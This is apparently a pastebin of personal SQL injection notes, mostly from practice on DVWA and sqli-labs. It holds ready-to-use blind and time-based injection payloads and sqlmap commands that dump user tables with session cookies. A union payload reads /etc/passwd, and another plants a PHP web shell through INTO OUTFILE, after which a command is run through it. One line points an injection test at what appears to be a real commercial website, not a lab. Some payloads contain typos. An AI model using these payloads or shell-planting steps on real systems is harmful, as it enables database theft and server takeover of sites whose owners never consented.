blackhat1337

Untitled

Mar 12th, 2024
  1. Time base
  2. 1' AND sleep(5)--+
  3.  
  4.  
  5. Retrieve version:
  6. 1' AND if(condition,true,false)
  7. 1' and if(1=1,sleep(5),null)
  8. 1' AND IF((SELECT ascii(substr(version(),1,1))) = 53,sleep(10),NULL)--+
  9.  
  10.  
  11. Retrieve version using LIKE:
  12. 1' AND IF(((SELECT version()) LIKE "5%",sleep(10),NULL)--+
  13.  
  14. Retrieve databases:
  15. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),1,1)))) = 115,sleep(10),NULL)--+ //s
  16.  
  17. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),2,1)))) = 101,sleep(10),NULL)--+ //e
  18.  
  19. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),3,1)))) = 99,sleep(10),NULL)--+ //c
  20.  
  21. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),4,1)))) = 117,sleep(10),NULL)--+ //u
  22.  
  23.  
  24. Retrieve Tables
  25. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),1,1)))) = 101 sleep(10),NULL)--+ //e
  26.  
  27. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),2,1)))) = 109 sleep(10),NULL)--+ //m
  28.  
  29. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),3,1)))) = 97 sleep(10),NULL)--+ //a
  30.  
  31.  
  32.  
  33.  
  34.  
  35. dvwa lab
  36.  
  37. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' and sleep(10)-- &Submit=Submit#
  38.  
  39.  
  40. 192.168.100.50/vulnerabilities/sqli_blind/?id=1' and if(1=1,sleep(5),null)-- +&Submit=Submit# << true: sleeps 5 sec
  41.  
  42.  
  43.  
  44. using sqlmap get method
  45. need login (cookie: Inspect >> Console >> document.cookie, copy it)
  46.  
  47. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --current-db --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low"
  48.  
  49.  
  50. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --tables -D dvwa --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low"
  51.  
  52.  
  53. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --columns -T users -D dvwa --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low"
  54.  
  55.  
  56. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --dump -T users -D dvwa --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low"
  57.  
  58.  
  59. specifying the parameter (-p)
  60. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/?id=1%27&Submit=Submit#" --dump -T users -D dvwa --cookie="PHPSESSID=vvc5vm52mes0c12pje6s286lu4; security=low" -p id
  61.  
  62.  
  63.  
  64. post method ( need burp)
  65.  
  66. sqlmap -u "http://192.168.100.50/vulnerabilities/sqli/" --data="id=1&Submit=Submit" --cookie="PHPSESSID=jc25hal7s1fhjl3j5402c78rc2; security=medium" --current-db
  67.  
  68.  
  69. using burp Repeater>> Request အကုန်ကူး
  70. POST /vulnerabilities/sqli/ HTTP/1.1
  71. Host: 192.168.100.50
  72. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
  73. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  74. Accept-Language: en-US,en;q=0.5
  75. Accept-Encoding: gzip, deflate, br
  76. Content-Type: application/x-www-form-urlencoded
  77. Content-Length: 18
  78. Origin: http://192.168.100.50
  79. Connection: close
  80. Referer: http://192.168.100.50/vulnerabilities/sqli/
  81. Cookie: PHPSESSID=jc25hal7s1fhjl3j5402c78rc2; security=medium
  82. Upgrade-Insecure-Requests: 1
  83.  
  84. id=1&Submit=Submit
  85.  
  86.  
  87. subl medium.req နဲ့ save
  88. sqlmap -r medium.req --dump -T users -D dvwa
  89.  
  90.  
  91. check outfile in sqlmap
  92. sqlmap -r medium.req --is-dba
  93.  
  94. is DBA : True (RW file)
  95.  
  96.  
  97. https://www.baizidsteel.com.bd/product_details.php?id=1'
  98.  
  99. Boolean-based blind
  100.  
  101. 1' AND 1=1-- + == True
  102. 1' AND 1=0-- + == False
  103.  
  104. for version check
  105. 1' AND (ascii(substr((select version()),1,1))) =53 -- + // 53 =5
  106. select version ဆိုတာ အများကြီးထွက်လာတဲ့ထဲက substr ဆိုပြီး အရှေ့ဆုံးတလုံးကိုပဲဖြတ်ထုတ်ပြီးပြပေးတာ
  107.  
  108.  
  109. for database length check
  110. 1' AND (ascii(substr((select length(databse())),1,1))) = 56--+ //56 =8
  111.  
  112.  
  113. for database check
  114. 1' AND (ascii(substr((select database()),1,1))) = 155 --+ //115 = s
  115. 1' AND (ascii(substr((select database()),2,1))) = 101 --+ //101 = e
  116. 1' AND (ascii(substr((select database()),3,1))) = 99 --+ //99 = c
  117. 1' AND (ascii(substr((select database()),4,1))) = 117 --+ //u
  118. 1' AND (ascii(substr((select database()),5,1))) = 114 --+ //r
  119. 1' AND (ascii(substr((select database()),6,1))) = 105 --+ //i
  120. 1' AND (ascii(substr((select database()),7,1))) = 116 --+ //t
  121. 1' AND (ascii(substr((select database()),8,1))) = 121 --+ //121 = y
  122.  
  123.  
  124. for all table count
  125. http://localhost/sqli-labs-master/less-8/?id=1' AND (ascii(substr((select count(*) form information_schema.tables where table_schema=database() limit 0,1),1,1))) =52 --+ //52 =4
  126.  
  127. Table Length check
  128. 1' AND (ascii(substr((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))) = 54 --+ //54 =6
  129.  
  130.  
  131. for first table name (character by character)
  132. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))) = 101 -- + //e
  133.  
  134. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))) = 109 -- + //m
  135.  
  136.  
  137. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))) = 97 -- + //a
  138.  
  139.  
  140. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))) = 105 -- + //i
  141.  
  142.  
  143. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))) = 108 -- + //l
  144.  
  145.  
  146. 1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))) = 115 -- + //s
  147.  
  148.  
  149. for second table name
  150. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 1,1),1,1))) =114 -- +
  151.  
  152.  
  153. for third table name
  154. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 2,1),1,1))) =117 -- +
  155.  
  156. for fourth table name length
  157. 1' AND (ascii(substr((select length(table_name) form information_schema.tables where table_schema=database() limit 3,1),1,1))) =53 -- + //5
  158.  
  159.  
  160. for fourth table name
  161. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),1,1))) =117 -- + //u
  162.  
  163. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),2,1))) =115 -- + //s
  164.  
  165. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),3,1))) =101 -- + //e
  166.  
  167. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),4,1))) =114 -- + //r
  168.  
  169. 1' AND (ascii(substr((select table_name form information_schema.tables where table_schema=database() limit 3,1),5,1))) =115 -- + //s
  170.  
  171.  
  172. Next Column
  173. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),1,1))) =117 -- + //u
  174.  
  175. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),2,1))) =115 -- + //s
  176.  
  177. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),3,1))) =101 -- + //e
  178.  
  179. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),4,1))) =114 -- + //r
  180.  
  181. 1' AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" and table_schema=database() LIMIT 0,1),5,1))) =95 -- + //_
  182.  
  183. or
  184.  
  185. 1' AND (ascii(substr((select concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273 limit 3,1),1,1))) = 117 -- + //u
  186.  
  187. 1' AND (ascii(substr((select concat(column_name)+from+information_schema.columns+where+table_name=0x7573657273 limit 3,1),2,1))) = 115 -- + //s
  188.  
  189.  
  190.  
  191. >>>>>>>>>>>>>>>>>>>>>>>>>>>
  192.  
  193. dvwa lab low security
  194. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' -- +&Submit=Submit#
  195.  
  196. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' order by 2-- +&Submit=Submit#
  197.  
  198. no vulnerable column found
  199. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' union select 1,2-- +&Submit=Submit#
  200.  
  201. so use blind queries
  202. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND 1=1-- +&Submit=Submit# << True
  203.  
  204. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND 1=2-- +&Submit=Submit# << false
  205.  
  206.  
  207. check version (first digit)
  208. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) =53 -- +&Submit=Submit# << not equal 53 version
  209.  
  210. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) <53 -- +&Submit=Submit# << less than 53 version true
  211.  
  212. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) <48 -- +&Submit=Submit# << less than 48 version false
  213.  
  214. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) =49-- &Submit=Submit# << equal 49 version
  215.  
  216.  
  217.  
  218. convert ascii
  219. https://www.duplichecker.com/ascii-to-text.php
  220. 49 >>> 1
  221.  
  222.  
  223. Second digit of version
  224.  
  225. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),2,1))) =49-- &Submit=Submit# << not equal 49 false
  226.  
  227. http://192.168.100.50/vulnerabilities/sqli_blind/?id=1' AND (ascii(substr((select version()),1,1))) =48-- &Submit=Submit# << equal 48 true
  228.  
  229. convert ascii
  230. 48 >>> 0
  231.  
  232.  
  233. dvwa medium security using burp
  234.  
  235. dvwa high security
  236.  
  237.  
  238. SQL injection file write requirements
  239. 1. Web server's file path
  240. 2. permission
  241. 3. db user write permission
  242.  
  243.  
  244. load file & file_priv check
  245. group_concat(user,0x3a,file_priv) from mysql.user
  246.  
  247. http://192.168.100.50/vulnerabilities/sqli/?id=1' union select user(),group_concat(user,0x3a,file_priv) from mysql.user--+&Submit=Submit#
  248.  
  249. http://192.168.100.50/vulnerabilities/sqli/?id=1' union select user(),load_file('/etc/passwd')--+&Submit=Submit#
  250.  
  251. upload phpfile
  252. http://192.168.100.50/vulnerabilities/sqli/?id=1' union select user(),'<?php phpinfo();?>' into outfile '/var/www/html/test/phpinfo.php'--+&Submit=Submit#
  253.  
  254. shell access (into outfile)
  255. http://192.168.100.50/vulnerabilities/sqli/?id=1' union select user(),'<?php system($_GET["cmd"]);?>' into outfile '/var/www/html/test/cmd.php'--+&Submit=Submit#
  256.  
  257. http://192.168.100.50/test/cmd.php?cmd=ls -al ../../
  258.  
  259. Mysql Database Update
  260.  
  261. default login
  262. sudo mysql
  263.  
  264. change password
  265. SET PASSWORD FOR 'root'@'localhost' = PASSWORD('mypass');
  266.  
  267. verify the updated password works
  268. mysql -u root -p
  269.  
  270. create database
  271. create database dvwa;
  272.  
  273. Show Database
  274. show databases;
  275.  
  276. Select or use database
  277. use dvwa;
  278.  
  279. Show table
  280. show tables;
  281.  
  282. dump tables
  283. select * from users;
  284.  
  285. select * from users where user='admin':
  286.  
  287.  
  288. update password of user 1337 in db
  289. update users set password=md5('1337') where user="1337";
  290.  
  291.  